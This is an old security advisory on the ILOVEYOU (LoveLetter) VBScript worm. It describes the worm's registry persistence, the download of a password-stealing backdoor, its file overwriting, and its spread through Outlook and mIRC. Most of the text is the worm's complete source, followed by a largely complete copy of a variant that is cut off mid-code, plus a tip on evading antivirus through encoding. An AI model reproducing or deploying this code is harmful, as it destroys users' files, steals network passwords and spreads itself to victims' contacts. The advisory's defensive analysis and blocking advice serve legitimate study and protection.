COMMAND ILOVEYOU (worm) SYSTEMS AFFECTED Almost any based on MS Win systems PROBLEM Huh... Due to big mass that this worm created here's info about it. A dangerous Visual Basic Script (VBScript) virus, dubbed the "LoveLetter" or "ILOVEYOU" virus, has been spreading itself across the Internet through email via Microsoft Outlook and through Internet Relay Chat (IRC) using a popular IRC client named mIRC. The virus is susceptible to activation whenever the Windows Script Host features are enabled (this description is by ISS advisory). Mail servers may incur mild to severe overloading and could crash when flooded with an unexpected number of the ILOVEYOU messages. The actual VBScript code performs a number of destructive tasks: - modifies and creates various Windows registry entries - launches Internet Explorer to download a backdoor program which, once installed, captures network passwords and emails this data to an account in the Philippines - infects the local machine by creating many new copies of itself and overwriting or hiding data files of specific file types (including VBScript, JavaScript, JPEG, and MP2/MP3) - spreads itself to other users by using information from the Microsoft Outlook Address Book, as well as mIRC's DCC feature, which allows chat participants to exchange files Visual Basic Scripts can be executed if Windows Script Host (WSH) is installed and enabled. Windows Script Host is installed by default with Windows 98 and with Internet Explorer version 4.0 and later. The message is very identifiable. The subject is always "ILOVEYOU", and the body of the email only contains the message "kindly check the attached LOVELETTER coming from me." The email contains a single instance of the virus in the form of an attachment named "LOVE-LETTER-FOR-YOU.TXT.vbs". For each address list that is found, a counter is kept in the registry to track the number of users that have been mailed. The number of email addresses in the address list is also recorded. If the number of addresses in the list increases, the virus will enumerate the individuals again and send out the "ILOVEYOU" mail to those who have not previously received it. All flags are kept in HKEY_CURRENT_USER\Software\Microsoft\WAB. The virus uses Internet Explorer to connect one of four HTTP web locations in an attempt to download a backdoor program called WIN-BUGSFIX.EXE. This backdoor program captures any network passwords it identifies and automatically emails this information to a mail account in the Philippines, controlled by the author of the virus. Before Internet Explorer is launched, the following registry entry, which sets the Internet Explorer start page, is changed to one of four URLs at random: \Software\Microsoft\Internet Explorer\Main\Start Page After the executable is downloaded, the start page value is set to "about:blank". The following registry entry is created (under HKEY_LOCAL_MACHINE) to launch WIN-BUGSFIX.EXE at boot-time: \Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX.EXE It seems the WIN-BUGSFIX.exe file will email any cached passwords to MAILME@SUPER.NET.PH. Zoa_Chien points out that the WIN-BUGSFIX.exe program connects to the SMPT server at 199.108.232.1 port 25 to send out its email message. You should block the address at your firewall. The message looks as follow: To: mailme@super.net.ph Subject: Barok... email.passwords.sender.trojan X-Mailer: Barok... email.passwords.sender.trojan---by: spyder Host: kakker Username: Default IP Address: 10.67.101.123 RAS Passwords: Cache Passwords: BLABLA\MPM : xxx BJORN\MUSIC : xxx TOM\SHARED : xxx TOM2\MP3 : xxx www.server.com/ : xxx:xxx MAPI : MAPI where all xxx's stand for plaintext usernames and passwords of SMB shares in the subnet. The virus identifies any "Fixed" or "Removable" drives connected to the system and recursively visits each folder, overwriting files of any of the following extensions with a copy of itself, changing the extension to ".vbs" and deleting the original file: vbs - Visual Basic Script vbe - Visual Basic Script (Encoded) js - JavaScript jse - JavaScript (Encoded) css - Cascading Style Sheets wsh - Windows Script Host sct - Scriptlet file hta - HTML Application The virus deletes any .jpg and .jpeg compressed image files, and replaces by a copy of the virus with ".vbs" appended to the end of the original file name. Original copies of any MP3 or MP2 audio files found are preserved, but a copy of the virus is created using the same file name with ".vbs" appended. The original MP2/MP3 file's attributes will be changed so the file is hidden. If any of the files "mirc32.exe", "mlink32.exe", "mirc.ini", "script.ini", or "mirc.hlp" are found, a new default initialization script named "script.ini" is created in the same directory: [script] ;mIRC Script ; Please dont edit this script... mIRC will corrupt, if mIRC will ; corrupt... WINDOWS will affect and will not run correctly. thanks ; ;Khaled Mardam-Bey ;http://www.mirc.com ; n0=on 1:JOIN:#:{ n1= /if ( $nick == $me ) { halt } n2= /.dcc send $nick &dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" n3=} This script will attempt to send a copy of the pre-generated HTML page to any user who is seen joining any channel you are in on IRC. Steve Wolfe posted a brief analysis of the "iloveyou" worm. The virus proliferates itself via email, sending letters with the subject "ILOVEYOU", and in the body, "kindly check the attached LOVELETTER coming from me." Attached is a VBScript file called "I-LOVE-YOU.TXT.vbs". The capitalization is apparently an attempt to fool users if they are not looking carefully, upon seeing the ".TXT", they think the file is a (safe) text file, and run it. Once executed, the script does the following: 1. If the key "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout" is set to a positive number in the registry, it is set to zero. If it is not present, it is not affected. 2. The VBScript then saves a copy of itself to: (a). \%%WINDIR%%\Win32DLL.vbs (b). \%%SYSDIR%%\MSKernel32.vbs (c). \%%SYSDIR%%\LOVE-LETTER-FOR-YOU.TXT.vbs 3. Sets the appropriate registry entries to start it on boot: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 => (b) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL => (a) 4. Changes the MSIE home page to a presumably malicious URL. If the file "WinFAT32.exe" exists, then it sets the startup page (contained in the registry setting (HKCU\Software\Microsoft\Internet Explorer\Main\Start Page) to one of the following URL's: http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe 5. If the "WIN-BUGSFIX.exe" file exists, it then sets it to run at boot: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX = > (download directory)\win-bugsfix.exe and also sets the MSIE startup page to about:blank (a blank page). 6. It then prints out HTML, containing these messages: This HTML file need ActiveX Control To Enable to read this HTML file - Please press #-#YES#-# button to Enable ActiveX 7. The ActiveX then sets the registry entries to make it run at boot, as in step #3, and writes the files as in step 2. 8. The virus spreads itself. It opens up a MAPI connection to your Outlook address list, and sends a copy of itself to each of the entries. 9. Enumerates disk drives and infects files. In infecting the files, it searches each of the drives found, and does the following: (A) Any file with the extensions .vbs, .vbe, .js, .jse, .css, .wsh, .sct, .hta, .jpg, or .jpeg are relaced with a copy of the virus. Then, it appears that a copy of the virus is also written to the name of the file with ".vbs" attached - for example, "logo.jpg" would be replaced with the virus, and a file called "logo.jpg.vbs" would be created as well. (B) If any file with the extensions .mp2 or .mp3 is encountered it will mark that file as hidden, then it will create a copy of itself with that name with the .vbs extensions - for example, "macarena.mp3" would be hidden, and a copy of the virus written to "macarena.mp3.vbs". (C) If mirc32.exe, mirc.ini, script.ini, mirc.hlp or mlink32.exe is encountered it will write to the script.ini in that directory, and modify it so that anyone joining a channel will be automatically sent a copy of LOVE-LETTER-FOR-YOU.htm, containing the virus. It seems a couple of variations of the worm are going around. At least one uses a subject line of "Joke" or "fw: Joke" and the attachment is called VeryFunny.vbs or the one that talks about Mothers Day. You can find the source of the original worm at: http://www.securityfocus.com/templates/archive.pike?list=82&msg=3911840F.D7597030@thievco.com&part=.1 Here it is: rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs" downread="" downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory") if (downread="") then downread="c:\" end if if (fileexist(dirsystem&"\WinFAT32.exe")=1) then Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe" end if end if if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank" end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc = fso.Drives For Each d in dc If d.DriveType = 2 or d.DriveType=3 Then folderlist(d.path&"\") end if Next listadriv = s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) if (ext="vbs") or (ext="vbe") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 end if if (eq<>folderspec) then if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" scriptini.WriteLine "n3=}" scriptini.close eq=folderspec end if end if next end sub sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f = fso.GetFolder(folderspec) set sf = f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub sub regcreate(regkey,regvalue) Set regedit = CreateObject("WScript.Shell") regedit.RegWrite regkey,regvalue end sub function regget(value) Set regedit = CreateObject("WScript.Shell") regget=regedit.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if (fso.GetFolderExists(folderspec)) then msg = 0 else msg = 1 end if fileexist = msg end function sub spreadtoemail() On Error Resume Next dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application") set mapi=out.GetNameSpace("MAPI") for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then regv=1 end if if (int(a.AddressEntries.Count)>int(regv)) then for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) regad="" regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead) if (regad="") then set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if x=x+1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if next Set out=Nothing Set mapi=Nothing end sub sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _ "<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM# -#,#-#main#-#)@-@ "&vbcrlf& _ "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM# -#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _ "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _ "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _ "<?-?BODY><?-?HTML>"&vbcrlf& _ "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ "<!--?-??-?"&vbcrlf& _ "if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>"&vbcrlf& _ "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ "<!--"&vbcrlf& _ "on error resume next"&vbcrlf& _ "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ "aw=1"&vbcrlf& _ "code=" dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _ "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _ "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _ "wri.write code4"&vbcrlf& _ "wri.close"&vbcrlf& _ "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _ "aw=0"&vbcrlf& _ "end if"&vbcrlf& _ "if (aw=1) then"&vbcrlf& _ "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ "window.close"&vbcrlf& _ "end if"&vbcrlf& _ "end if"&vbcrlf& _ "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _ "regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>" dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'") dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") set fso=CreateObject("Scripting.FileSystemObject") set c=fso.OpenTextFile(WScript.ScriptFullName,1) lines=Split(c.ReadAll,vbcrlf) l1=ubound(lines) for n=0 to ubound(lines) lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) if (l1=n) then lines(n)=chr(34)+lines(n)+chr(34) else lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if next set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") b.close set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) d.write dt5 d.write join(lines,vbcrlf) d.write vbcrlf d.write dt6 d.close end sub ISS and others had become aware of several other variants of this virus as shown below. Please note that modifying the virus is trivial and that new versions may be distributed at any time. - Subject: fwd: Joke Attachment: Very Funny.vbs - Subject: Susitikim shi vakara kavos puodukui... Body: kindly check the attached LOVELETTER coming from me. Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs - Subject: Mothers Day Order Confirmation Body: We have proceeded to charge your credit card for the amount of $326.92 for the mothers day diamond special. We have attached a detailed invoice to this email. Please print out the attachment and keep it in a safe place. Thanks Again and Have a Happy Mothers Day! mothersday@subdimension.com Attachment: mothersday.vbs When the attachment is opened, the malicious VBScript code launches, performing the following operations in sequence: - The virus removes the timeout associated with the Windows scripting unit by changing the value of the HKEY_CURRENT_USER\Software\Microsoft\ Windows Scripting Host\Settings\Timeout registry key. - The virus copies itself to SYSTEMDIR\MSKernel32.vbs, WINDIR\Win32DLL.vbs, and SYSTEMDIR\LOVE-LETTER-FOR-YOU.TXT.vbs - The following registry entries are created under HKEY_LOCAL_MACHINE, such that the MSKernel32.vbs and Win32DLL.vbs copies will be launched at boot-time: \Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 \Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL Win32DLL.vbs is created as a service. - An HTML file named LOVE-LETTER-FOR-YOU.HTM is created for later use (in the mIRC script) and placed in the Windows SYSTEMDIR. Typically, WINDIR is C:\WINDOWS and SYSTEMDIR is C:\WINDOWS\SYSTEM. - The virus attempts to spread itself via e-mail using Microsoft Outlook. It sends a message to all addresses found in every address book. Each individual is flagged in the registry after they have been sent a copy. For each address list that is found, a counter is kept in the registry to track the number of users that have been mailed. The number of email addresses in the address list is also recorded. If the number of addresses in the list increases, the virus will enumerate the individuals again and send out the "ILOVEYOU" mail to those who have not previously received it. All flags are kept in HKEY_CURRENT_USER\Software\Microsoft\WAB - The virus uses Internet Explorer to connect one of four HTTP web locations in an attempt to download a backdoor program called WIN-BUGSFIX.EXE. This backdoor program captures any network passwords it identifies and automatically emails this information to a mail account in the Philippines, presumably controlled by the author of the virus. The original download locations for the WIN-BUGSFIX.EXE file seem to be invalid. Be aware that modified versions of the virus may point to valid copies of the backdoor, so this is still a threat. Before Internet Explorer is launched, the following registry entry, which sets the Internet Explorer start page, is changed to one of four URLs at random: \Software\Microsoft\Internet Explorer\Main\Start Page After the executable is downloaded, the start page value is set to "about:blank". The Mother's Day variation of the virus does not attempt to install the backdoor, but does modify the Internet Explorer start page. - The following registry entry is created (under HKEY_LOCAL_MACHINE) to launch WIN-BUGSFIX.EXE at boot-time: \Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX.EXE - The virus identifies any local or network drives connected to the system and recursively visits each folder, overwriting files of any of the following extensions with a copy of itself, changing the extension to ".vbs" and deleting the original file: vbs - Visual Basic Script vbe - Visual Basic Script (Encoded) js - JavaScript jse - JavaScript (Encoded) css - Cascading Style Sheets wsh - Windows Scripting Host sct - Scriptlet file hta - HTML Application The virus deletes any ".jpg" and ".jpeg" compressed image files, and replaces a copy of the virus with ".vbs" appended to the end of the original file name. The Mother's Day variation of the virus removes files of type ".ini" (Windows script files) and ".bat" (DOS batch files) instead of ".jpg" and ".jpeg". Original copies of any MP3 or MP2 audio files found are preserved, but a copy of the virus is created using the same file name with ".vbs" appended. The original MP2/MP3 file's attributes will be changed so the file is hidden. - If any of the files "mirc32.exe", "mlink32.exe", "mirc.ini", "script.ini", or "mirc.hlp" are found, a new default initialization script named "script.ini" is created in the same directory: [script] ;mIRC Script ; Please dont edit this script... mIRC will corrupt, if mIRC will ; corrupt... WINDOWS will affect and will not run correctly. thanks ; ;Khaled Mardam-Bey ;http://www.mirc.com ; n0=on 1:JOIN:#:{ n1= /if ( $nick == $me ) { halt } n2= /.dcc send $nick &dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" n3=} This script will attempt to send a copy of the pre-generated HTML page to any user who is seen joining any channel you are in on IRC. Sean Malloy is letting us known that changing the virus to use a WSF extension instead of VBS is just as affective. WSF stands for Windows Scripting File. Antivirus vendors that want to be proactive might want to add this extension to their signatures. The file contents would look something like this: <job id="iloveyou"> <script language="VBScript"> 'insert code here </script> </job> or as Sean points out you could encode it to obfuscate it by doing: <job id="iloveyouencrypted"> <script language="VBScript.Encode"> #@~^EQAAAA==vbxd^?DDPmKN^?~t^?DnOwYAAA==^#~@ </script> </job> where "#@~^EQAAAA==vbxd^?DDPmKN^?~t^?DnOwYAAA==^#~@' is the encoded worm. It seems the "fwd: Joke" variant attachment is "Very Funny.vbs" (note the space) and not "VeryFunny.vbs". Or maybe its a new variant. Very Funny.vbs: rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\Very Funny.vbs") regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs" downread="" downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory") if (downread="") then downread="c:\" end if if (fileexist(dirsystem&"\WinFAT32.exe")=1) then Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe" end if end if if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank" end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc = fso.Drives For Each d in dc If d.DriveType = 2 or d.DriveType=3 Then folderlist(d.path&"\") end if Next listadriv = s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) if (ext="vbs") or (ext="vbe") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 end if if (eq<>folderspec) then if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\Very Funny.HTM" scriptini.WriteLine "n3=}" scriptini.close eq=folderspec end if end if next end sub sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f = fso.GetFolder(folderspec) set sf = f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub sub regcreate(regkey,regvalue) Set regedit = CreateObject("WScript.Shell") regedit.RegWrite regkey,regvalue end sub function regget(value) Set regedit = CreateObject("WScript.Shell") regget=regedit.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if (fso.GetFolderExists(folderspec)) then msg = 0 else msg = 1 end if fileexist = msg end function sub spreadtoemail() On Error Resume Next dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application") set mapi=out.GetNameSpace("MAPI") for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 